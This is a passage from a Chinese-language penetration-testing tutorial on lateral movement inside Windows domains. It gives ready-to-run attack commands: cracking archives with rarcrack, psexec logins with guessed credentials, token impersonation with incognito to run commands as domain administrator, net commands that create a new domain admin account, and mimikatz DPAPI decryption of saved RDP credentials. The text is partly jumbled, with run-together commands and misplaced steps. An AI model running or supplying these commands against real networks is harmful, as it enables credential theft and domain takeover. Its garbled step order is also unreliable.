渗透测试干货 | 横向渗透的常见方法( 五 )


rarcrack 123.zip --threads 10 --type zip如果允许出现错误 。 那么可以执行sudo apt-get install libxml2-dev libxslt-dev进行修复 。
渗透测试干货 | 横向渗透的常见方法文章插图
shell控制连接
通过端口爆破445得到账号密码 。 没有开3389没法直接登录 , 此时借用psexec直接调用cmd登录 。 也可以通过incognito劫持token , 如果有域管理员token劫持DC , 创建一个域管理员出来
1.psexec.exe
下载地址:通过得到的账号密码信息链接跳板机 , 通过smb爆破得到账号密码 , 如果目标没有开启3389/23服务无法直接登录 , 借助psexec.exe工具通过smb服务调用目标cmd
psexec.exe \\192.168.198.138 -u administrator -p 123456 cmd
渗透测试干货 | 横向渗透的常见方法文章插图
2.incognito.exe提权
yum -y install samba-client/apt-get install samba-client
渗透测试干货 | 横向渗透的常见方法文章插图
smbclient //192.168.1.8/tools -U administrator
渗透测试干货 | 横向渗透的常见方法文章插图
#域控账号登陆过普通主机 , 可以尝试拿到域低权限账号利用incognito工具劫持域控身份#查找被攻击的计算机中是否有DC的tokenincognito.exe -h 192.168.200.11 -u admin -p 123123 list_tokens -u#利用DA的token创建新的DC , 调用DC的cmd.exeincognito.exe -h 192.168.200.11 -u admin -p 123123 execute -c "XY\ADMINISTRATOR" cmd.exe#执行创建DC命令net user hh 123.com /add /domainnet group "domain admins" hh /add /domainLinux下通过smbclient访问windows共享目录1.安装smbclient
yum -y install samba-client/apt-get install samba-client2.查看共享
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
渗透测试干货 | 横向渗透的常见方法文章插图
3.smb连接
smbclient //192.168.1.8/tools -U administrator
渗透测试干货 | 横向渗透的常见方法文章插图
执行smbclient命令成功后 , 进入smbclient环境 , 出现提示符:smb:/> 这里命令和ftp命令相似 , 如cd 、lcd、get、megt、put、mput等 。 通过这些命令 , 我们可以访问远程主机的共享资源
渗透测试干货 | 横向渗透的常见方法文章插图
本地rdp密码读取
1.查看当前服务器历史记录
#查看rdp连接历史记录cmdkey /list
渗透测试干货 | 横向渗透的常见方法文章插图
2.查找保存在本地的认证 , 得到对应路径以及值

C:**加粗样式**\Users\admin\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363
渗透测试干货 | 横向渗透的常见方法文章插图
得到:
mimikatzdpapi::cred /in:C:\Users\MIN\AppData\Local\Microsoft\Credentials\1F914B4D8F36DFD93C3A37B7D5491363


推荐阅读